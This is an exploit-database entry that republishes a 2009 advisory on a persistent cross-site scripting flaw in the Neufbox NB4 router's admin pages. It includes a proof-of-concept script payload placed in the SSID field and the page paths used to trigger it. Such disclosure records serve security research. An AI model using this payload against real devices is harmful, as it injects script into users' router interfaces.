header-logo
Suggest Exploit
vendor:
NB4-R1.5.10-MAIN
by:
599eme Man
7.5
CVSS
HIGH
Persistent XSS
79
CWE
Product Name: NB4-R1.5.10-MAIN
Affected Version From: Neufbox NB4-R1.5.10-MAIN
Affected Version To: Neufbox NB4-R1.5.10-MAIN
Patch Exists: YES
Related CWE: N/A
CPE: h:neufbox:nb4-r1.5.10-main
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Neufbox NB4-R1.5.10-MAIN Persistent XSS

The vulnerability is present in the http://[IPLocal]/3_1 page, where an attacker can inject a malicious SSID=1><script>alert(1)</script> and then execute the XSS by going to http://[IPLocal]/3_0

Mitigation:

Input validation and output encoding should be used to prevent XSS attacks.
Source

Exploit-DB raw data:

_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_
_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_
_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_
_____0______0______0__0______0___0__0________0___0__00000__0___0_
_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_
_________________________________________________________________



# [+] Neufbox NB4-R1.5.10-MAIN Persistent XSS
# [+] Author : 599eme Man
# [+] Contact : Flouf@live.fr
# [+] Thanks : Moudi, Kim, Neocoderz, Syltrox66, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker, Security-shell...
#
#[------------------------------------------------------------------------------------]
# 
# [+] Vulnerability
#
#	[+] Persistent XSS
#
#		- http://[IPLocal]/3_1 => SSID = 1><script>alert(1)</script>
#		  Valid and go here to execute the XSS : http://[IPLocal]/3_0
#
#[------------------------------------------------------------------------------------]
#
#########################################################################################################

# milw0rm.com [2009-09-14]